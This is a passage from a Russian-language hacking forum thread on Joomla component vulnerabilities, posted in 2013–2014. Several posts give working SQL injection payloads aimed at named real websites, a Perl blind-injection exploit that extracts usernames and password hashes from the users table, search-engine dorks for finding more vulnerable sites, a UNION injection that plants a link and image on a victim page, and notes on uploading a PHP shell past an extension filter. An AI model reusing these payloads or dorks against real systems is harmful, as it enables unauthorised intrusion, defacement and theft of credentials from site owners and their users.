HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #281  
Старый 04.02.2013, 08:13
dmg
Guest
Сообщений: n/a
Провел на форуме:
50454

Репутация: 0
По умолчанию

Подскажите пожалуйста, это какая версия джумлы: $Id: configuration.php-dist 11687 2009-03-11 17:49:23Z ian $ ?
 
Ответить с цитированием

  #282  
Старый 25.02.2013, 23:58
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Blind

Joomla "com_spidercalendar" component SQL Injection

Уязвим параметр calendar_id

POC:

Цитата:
Сообщение от None  
http://www.saawf.co.za/index.php?option=com_spidercalendar&view=spidercal endar&calendar_id=1+and+1=1+--+&module_id=60&date60=2012-08-11&Itemid=
- true

Цитата:
Сообщение от None  
http://www.saawf.co.za/index.php?option=com_spidercalendar&view=spidercal endar&calendar_id=1+and+1=0+--+&module_id=60&date60=2012-08-11&Itemid=
- false

Exploit переписанный под пример данного сайта!

Цитата:
Сообщение от None  
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " \n"; print " ################################################## ##############\n"; print " # Joomla Component com_spidercalendar Blind SQL Injection Exploit #\n"; print " # Author:winstrool #\n"; print " ################################################## ##############\n"; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my $tid = $ARGV[2]; my %options = (); GetOptions(\%options, "p=s", "t=i"); print "[~] Exploiting...\n"; if($options{"t"}) { $tid = $options{"t"}; } syswrite(STDOUT, "[~] MD5-Hash: ", 14); for(my $i = 1; $i new; my $query = "http://".$host.$path."index.php?option=com_spidercalendar &calendar_id=".$tid." and (SUBSTRING((SELECT concat(username,0x3a,password,0x3a,usertype) from jos_users limit 0,1),".$i.",1))=CHAR(".$h.") -- &module_id=60&date60=2012-08-11&Itemid=" ; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } my $resp = $ua->get($query); my $content = $resp->as_string; if($content =~ /Rankings/) { #print $h; return 1; } else { return 0; } }
Дорк: "inurl:index.php?option=com_spidercalendar calendar_id=*"

Уязвимый код:

Пока нет...

P.S:Уязвимость другой переменной данного компанента

http://www.exploit-db.com/exploits/23782/ (2012-12-31)
 
Ответить с цитированием

  #283  
Старый 26.02.2013, 15:16
KolosJey
Новичок
Регистрация: 21.12.2009
Сообщений: 0
Провел на форуме:
15756

Репутация: 0
По умолчанию

Цитата:
Сообщение от winstrool  
winstrool said:
Joomla "com_spidercalendar" component SQL Injection
Уязвим параметр
calendar_id
POC:
-
true
-
false
Exploit переписанный под пример данного сайта!
Дорк:
"inurl:index.php?option=com_spidercalendar calendar_id=*"
Уязвимый код:
Пока нет...
P.S:Уязвимость другой переменной данного компанента
http://www.exploit-db.com/exploits/23782/ (2012-12-31)
Ты всё-же мой любимый хакер

Blind - OK

http://www.saawf.co.za/index.php?option=com_spidercalendar&view=spidercal endar&calendar_id=1 UNION SELECT 1,2,3,4,0x3c61207461726765743d225f626c616e6b222068 7265663d22687474703a2f2f7777772e726164696b616c2e72 75223e3c696d67207372633d22687474703a2f2f693038312e 726164696b616c2e72752f313330322f31342f326637633233 3033326532612e6a706722203e3c2f613e,6,7,8,9,10,11,1 2,13,14,15,16,17-- &module_id=60&date60=2012-08-11&Itemid=
 
Ответить с цитированием

  #284  
Старый 26.02.2013, 22:26
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от KolosJey  
KolosJey said:
Ты всё-же мой любимый хакер
Blind - OK
http://www.saawf.co.za/index.php?option=com_spidercalendar&view=spidercal endar&calendar_id=1 UNION SELECT 1,2,3,4,0x3c61207461726765743d225f626c616e6b222068 7265663d22687474703a2f2f7777772e726164696b616c2e72 75223e3c696d67207372633d22687474703a2f2f693038312e 726164696b616c2e72752f313330322f31342f326637633233 3033326532612e6a706722203e3c2f613e,6,7,8,9,10,11,1 2,13,14,15,16,17-- &module_id=60&date60=2012-08-11&Itemid=
а ты все также смышлен))) действует не везде, а с блиндом проходит больше ситуаций, да и кому, как крутить дело каждого...
 
Ответить с цитированием

  #285  
Старый 04.03.2013, 18:57
Disasm
Новичок
Регистрация: 10.08.2008
Сообщений: 18
Провел на форуме:
62627

Репутация: 6
По умолчанию

Ни у кого случайно не завалялись исходники уязвимого к LFI компонента com_properties версия 3.1.22-03

Столкнулся с проблемой усечения расширения null байтом. Глянуть бы исходники

Подробности тут: /thread375124.html

P.S. Очень плохая манера описывать уязвимость и не указывать участок кода, в котором она найдена, т.к. зачастую после публикации уязвимости скрипт попросту пропадает с прилавков интернета...
 
Ответить с цитированием

  #286  
Старый 21.08.2013, 13:34
ravencrow
Guest
Сообщений: n/a
Провел на форуме:
2290

Репутация: 0
По умолчанию

Как узнать версию Joomla 2.5/3.0

Если есть доступ на чтение из БД, выполнить следующий запрос:

select version_id from префикс_schemas where extension_id=700;

или

select manifest_cache from префикс_extensions where extension_id=700;
 
Ответить с цитированием

  #287  
Старый 21.08.2013, 14:16
ravencrow
Guest
Сообщений: n/a
Провел на форуме:
2290

Репутация: 0
По умолчанию

Цитата:
Сообщение от exstreme  
exstreme said:
Кто может рассказать более подробно про данную уязвимость, а точнее как она осуществялется?
Код:
Code:
Description

Inadequate filtering leads to the ability to bypass file type upload restrictions.
Affected Installs

Joomla! version 2.5.13 and earlier 2.5.x versions; and version 3.1.4 and earlier 3.x versions.
Описание уязвимости http://developer.joomla.org/security...orised-uploads

Уязвимый код https://github.com/joomla/joomla-cms...3d5378622133d8

Позволяет залить шелл с расширением *.php. (на конце расширения файла точка) через встроенный медиа-менеджер Joomla. Требуется доступ на сайт в качестве автора/редактора. Т.е. без соответствующих привелегий залить не получится.

Актуально для версий Joomla от 2.5.0 до 2.5.13 и от 3.0.0 до 3.1.4 включительно.
 
Ответить с цитированием

  #288  
Старый 09.11.2013, 19:18
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Joomla "com_muscol" component SQL Injection

Уязвим параметр genre_id, в данном компаненте есть и другие уязвимые параметры.

POC:

Цитата:
Сообщение от None  
http://www.jazz.org.au/index.php?option=com_muscol&view=search&search=alb ums&genre_id=2+and(select+ascii(mid(concat(version ()),1,1))=53)
- true

Цитата:
Сообщение от None  
http://www.jazz.org.au/index.php?option=com_muscol&view=search&search=alb ums&genre_id=2+and(select+ascii(mid(concat(version ()),1,1))=52)
- false

Дорк: "inurl:index.php?option=com_muscol genre_id=*"

Уязвимый код:

Пока нет...
 
Ответить с цитированием

  #289  
Старый 11.12.2013, 16:37
Ravenous
Guest
Сообщений: n/a
Провел на форуме:
44130

Репутация: 26
По умолчанию

Цитата:
Сообщение от winstrool  
winstrool said:
Уязвимый код:
Пока нет...
Файл: components/com_muscol/models/search.php

Код:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]genre_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]JRequest[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getVar[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'genre_id'[/COLOR][COLOR="#007700"]);

...

function[/COLOR][COLOR="#0000BB"]_buildQuery[/COLOR][COLOR="#007700"](){

if(empty([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"])){



[/COLOR][COLOR="#0000BB"]$keywords[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]keywords[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$artist_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]artist_id[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$genre_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]genre_id[/COLOR][COLOR="#007700"];



[/COLOR][COLOR="#0000BB"]$where_clause[/COLOR][COLOR="#007700"]= array();



if
([/COLOR][COLOR="#0000BB"]$keywords[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]$where_clause[/COLOR][COLOR="#007700"][] =[/COLOR][COLOR="#DD0000"]' s.name LIKE "%'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$keywords[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'%"'[/COLOR][COLOR="#007700"];



if
([/COLOR][COLOR="#0000BB"]$artist_id[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {

[/
COLOR][COLOR="#0000BB"]$where_clause[/COLOR][COLOR="#007700"][] =[/COLOR][COLOR="#DD0000"]' ( al.artist_id = '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$artist_id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' OR s.artist_id = '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$artist_id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]')'[/COLOR][COLOR="#007700"];

}

if ([/COLOR][COLOR="#0000BB"]$genre_id[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {

[/
COLOR][COLOR="#0000BB"]$genre[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$genre_id[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getDescendantsId[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$genre_id[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$descendants[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]descendantsId[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$descendants[/COLOR][COLOR="#007700"][] =[/COLOR][COLOR="#0000BB"]$genre_id[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$genre_clause[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]' (( s.genre_id = '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]implode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]' OR s.genre_id = '[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$descendants[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]' ) '[/COLOR][COLOR="#007700"].

[/
COLOR][COLOR="#DD0000"]' OR ( s.genre_id ="" AND ( al.genre_id = '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]implode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]' OR al.genre_id = '[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$descendants[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]' ) ) )'[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$where_clause[/COLOR][COLOR="#007700"][] =[/COLOR][COLOR="#0000BB"]$genre_clause[/COLOR][COLOR="#007700"];

}



[/COLOR][COLOR="#FF8000"]// Build the where clause of the content record query

[/COLOR][COLOR="#0000BB"]$where_clause[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$where_clause[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#DD0000"]' WHERE '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]implode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]' AND '[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$where_clause[/COLOR][COLOR="#007700"]) :[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]);



[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]' SELECT s.*,al.name as album_name,al.image, ar.artist_name FROM #__muscol_songs as s '[/COLOR][COLOR="#007700"].

[/
COLOR][COLOR="#DD0000"]' LEFT JOIN #__muscol_albums as al ON al.id = s.album_id '[/COLOR][COLOR="#007700"].

[/
COLOR][COLOR="#DD0000"]' LEFT JOIN #__muscol_artists as ar ON ( ar.id = s.artist_id OR ar.id = al.artist_id ) '[/COLOR][COLOR="#007700"].

[/
COLOR][COLOR="#0000BB"]$where_clause[/COLOR][COLOR="#007700"].

[/
COLOR][COLOR="#DD0000"]' ORDER BY s.artist_id, al.year, al.month, al.id, s.disc_num,s.num '

[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#FF8000"]//echo $this->query; die();

[/COLOR][COLOR="#007700"]}

return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"];

}[/COLOR][/COLOR
 
Ответить с цитированием

  #290  
Старый 04.11.2014, 02:33
look2009
Новичок
Регистрация: 03.06.2009
Сообщений: 2
Провел на форуме:
7702

Репутация: 0
По умолчанию

joomla 3.2.1

index.php/weblinks-categories?id=0%20%29%20union%20select%20concat_ws (0x3a,username,password)%20from%20%60ppo1v_users%6 0%20--%20%29
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Сценарии/CMF/СMS 49 02.04.2015 17:48
Обзор бесплатных Cms em00s7 PHP 16 03.07.2009 13:13
Cms Cawabunga PHP 20 05.08.2007 00:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ